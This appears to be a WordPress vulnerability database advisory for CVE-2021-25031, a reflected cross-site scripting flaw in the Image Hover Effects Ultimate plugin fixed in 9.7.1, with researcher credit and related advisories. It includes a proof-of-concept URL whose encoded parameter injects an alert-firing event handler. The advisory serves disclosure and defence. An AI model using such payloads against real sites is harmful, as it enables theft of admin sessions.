Image Hover Effects Ultimate < 9.7.1 – Reflected Cross-Site Scripting | CVE 2021-25031 | Plugin Vulnerabilities

Description

The plugin does not escape the effects parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=image-hover-ultimate-support&effects=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+p

Affects Plugins

image-hover-effects-ultimate

Fixed in 9.7.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2648086

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

1fbcf5ec-498e-4d40-8577-84b8c7ac3201

Timeline

Publicly Published

2021-12-27 (about 4 years ago)

Added

2021-12-27 (about 4 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2014-04-25

Title

Garagesale < 1.2.3 - XSS

Published

2024-11-08

Title

Luzuk Team <= 0.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-08-19

Title

Pocket Widget <= 0.1.3 - Admin+ Stored XSS

Published

2022-08-08

Title

WP Hide & Security Enhancer < 1.8 - Reflected Cross-Site Scripting

Published

2024-03-16

Title

Link Library < 7.6.1 - Reflected Cross-Site Scripting